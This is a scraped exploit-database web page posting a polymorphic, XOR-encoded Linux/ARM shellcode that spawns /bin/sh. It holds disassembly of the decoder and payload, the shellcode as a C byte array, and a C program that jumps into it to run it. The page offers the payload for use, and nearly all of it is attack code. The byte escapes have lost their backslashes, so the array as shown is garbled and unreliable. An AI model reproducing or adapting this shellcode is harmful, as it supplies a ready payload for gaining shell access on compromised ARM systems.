Home / os / win7

linux/ARM - Polymorphic execve("/bin/sh", ["/

Posted on 03 July 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>linux/ARM - Polymorphic execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;], NULL); 78 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================================================================
linux/ARM - Polymorphic execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;], NULL); - XOR 88 encoded - 78 bytes
=========================================================================================


/*
Title:     Linux/ARM - Polymorphic execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;], NULL); - XOR 88 encoded - 78 bytes
Date:      2010-06-28
Tested on: ARM926EJ-S rev 5 (v5l)
 
Author:    Jonathan Salwan
Web:       http://shell-storm.org | http://twitter.com/shell_storm
 
! Database of shellcodes http://www.shell-storm.org/shellcode/
 
  
 
== Disassembly of XOR decoder ==
 
00008054 &lt;debut-0x8&gt;:
    8054:   e28f6024    add r6, pc, #36 ; 0x24
    8058:   e12fff16    bx  r6
 
0000805c &lt;debut&gt;:
    805c:   e3a040e3    mov r4, #227    ; 0xe3
 
00008060 &lt;boucle&gt;:
    8060:   e3540c01    cmp r4, #256    ; 0x100
    8064:   812fff1e    bxhi    lr
    8068:   e24440e3    sub r4, r4, #227    ; 0xe3
    806c:   e7de5004    ldrb    r5, [lr, r4]
    8070:   e2255058    eor r5, r5, #88 ; 0x58
    8074:   e7ce5004    strb    r5, [lr, r4]
    8078:   e28440e4    add r4, r4, #228    ; 0xe4
    807c:   eafffff7    b   8060 &lt;boucle&gt;
    8080:   ebfffff5    bl  805c &lt;debut&gt;
 
 
== Disassembly of execve(&quot;/bin/sh&quot;, [&quot;/bin/sh&quot;], NULL) ==
 
00008054 &lt;_start&gt;:
    8054:   e28f6001    add r6, pc, #1  ; 0x1
    8058:   e12fff16    bx  r6
    805c:   4678        mov r0, pc
    805e:   300a        adds    r0, #10
    8060:   9001        str r0, [sp, #4]
    8062:   a901        add r1, sp, #4
    8064:   1a92        subs    r2, r2, r2
    8066:   270b        movs    r7, #11
    8068:   df01        svc 1
    806a:   2f2f        cmp r7, #47
    806c:   6962        ldr r2, [r4, #20]
    806e:   2f6e        cmp r7, #110
    8070:   6873        ldr r3, [r6, #4]
 
 
*/
 
#include &lt;stdio.h&gt;
 
 
char SC[] = &quot;x24x60x8fxe2&quot;
            &quot;x16xffx2fxe1&quot;
            &quot;xe3x40xa0xe3&quot;
            &quot;x01x0cx54xe3&quot;
            &quot;x1exffx2fx81&quot;
            &quot;xe3x40x44xe2&quot;
            &quot;x04x50xdexe7&quot;
            &quot;x58x50x25xe2&quot;
            &quot;x04x50xcexe7&quot;
            &quot;xe4x40x84xe2&quot;
            &quot;xf7xffxffxea&quot;
            &quot;xf5xffxffxeb&quot;
            &quot;x59x68xd7xba&quot;
            &quot;x4bxa7x77xb9&quot;
            &quot;x20x1ex52x68&quot;
            &quot;x59xc8x59xf1&quot;
            &quot;xcax42x53x7f&quot;
            &quot;x59x87x77x77&quot;
            &quot;x3ax31x36x77&quot;
            &quot;x2bx30&quot;;
 
 
int main(void)
{
        fprintf(stdout,&quot;Length: %d
&quot;,strlen(SC));
        (*(void(*)()) SC)();
return 0;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-03]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :